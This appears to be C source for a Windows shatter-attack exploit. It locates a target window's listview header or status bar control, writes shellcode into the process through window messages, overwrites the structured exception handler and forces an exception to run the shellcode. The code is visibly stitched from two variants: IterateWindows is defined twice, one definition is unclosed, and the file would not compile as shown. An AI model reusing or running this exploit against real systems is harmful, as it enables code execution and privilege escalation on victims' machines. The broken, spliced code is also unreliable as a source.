int main(int argc, char *argv[])
{
HMODULE hMod;
DWORD ProcAddr;
long x;
printf("%% Playing with status bar messages\n");
printf("%% [email protected]\n\n");
if (argc == 2)
sscanf(argv[1],"%lx",&heapaddr); // Oddity
printf("%% Using base heap address...0x%xh\n",heapaddr);
printf("+ Finding %s Window...\n",tWindow);
mainhWnd = (long)FindWindow(NULL,tWindow);
if(mainhWnd == NULL)
{
printf("+ Couldn't Find %s Window\n",tWindow);
return 0;
}
printf("+ Found Main Window At......0x%xh\n",mainhWnd);
IterateWindows(mainhWnd);
printf("+ Done...\n");
return 0;
}
void IterateWindows(long hWnd)
{
long childhWnd,looper;
childhWnd = GetNextWindow(hWnd,GW_CHILD);
while (childhWnd != NULL)
{
IterateWindows(childhWnd);
childhWnd = GetNextWindow(childhWnd ,GW_HWNDNEXT);
}
hLVControl = hWnd;
hHdrControl = SendMessage((HWND) hLVControl,(UINT) LVM_GETHEADER, 0,0);
if(hHdrControl != NULL)
{
// Found a Listview Window with a Header
printf("+ Found listview window..0x%xh\n",hLVControl);
printf("+ Found lvheader window..0x%xh\n",hHdrControl);
// Inject shellcode to known address
printf("+ Sending shellcode to...0x%xh\n",shellcodeaddr);
for (looper=0;looper<sizeof(exploit);looper++)
doWrite((long) exploit[looper],(shellcodeaddr + looper));
// Overwrite SEH
printf("+ Overwriting Top SEH....0x%xh\n",sehHandler);
doWrite(((shellcodeaddr) & 0xff),sehHandler);
doWrite(((shellcodeaddr >> 8) & 0xff),sehHandler+1);
doWrite(((shellcodeaddr >> 16) & 0xff),sehHandler+2);
doWrite(((shellcodeaddr >> 24) & 0xff),sehHandler+3);
// Cause exception
printf("+ Forcing Unhandled Exception\n");
SendMessage((HWND) hHdrControl,(UINT) HDM_GETITEMRECT,0,1);
printf("+ Done...\n");
exit(0);
}
void IterateWindows(long hWnd)
{
long childhWnd,looper;
childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD);
while (childhWnd != NULL)
{
IterateWindows(childhWnd);
childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT);
}
GetClassName( (HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf) );
if ( strcmp(g_classNameBuf, "msctls_statusbar32") ==0)
{
// Find Heap Address
BruteForceHeap((HWND) hWnd);
// Inject shellcode to known address
printf("+ Sending shellcode to......0x%xh\n",shellcodeaddr);
for (looper=0;looper<sizeof(exploit);looper++)
doWrite((HWND)hWnd, (long) exploit[looper],(shellcodeaddr + looper));
// Overwrite SEH
printf("+ Overwriting Top SEH.......0x%xh\n",sehHandler);
doWrite((HWND)hWnd, ((shellcodeaddr) & 0xff),sehHandler);
doWrite((HWND)hWnd, ((shellcodeaddr >> 8) & 0xff),sehHandler+1);
doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2);
doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3);
// Cause exception
printf("+ Forcing Unhandled Exception\n");
SendMessage((HWND) hWnd,(UINT) SB_GETPARTS,1,1);
printf("+ Done...\n");
exit(0);
}
